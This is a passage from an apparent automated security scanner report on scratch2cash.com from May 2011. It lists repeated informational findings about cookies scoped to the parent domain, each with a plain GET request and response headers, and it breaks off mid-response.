User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:42:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ot1ghj45nru51srozltshq55; path=/; HttpOnly
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 11:42:49 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: UniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 43974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.196. http://www.scratch2cash.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.197. http://www.scratch2cash.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.198. http://www.scratch2cash.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.199. http://www.scratch2cash.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.200. http://www.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.201. http://www.scratch2cash.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.202. http://www.scratch2cash.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.203. http://www.scratch2cash.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.204. http://www.scratch2cash.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.205. http://www.scratch2cash.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46391


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.206. http://www.scratch2cash.com/Sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Sitemap.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.207. http://www.scratch2cash.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.208. http://www.scratch2cash.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; BO=FM; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utma=1.1546523937.1305546138.1305546138.1305548289.2; __utmc=1; __utmb=1.2.10.1305548289

Response

HTTP/1.1 200 OK
Cache-Control: private
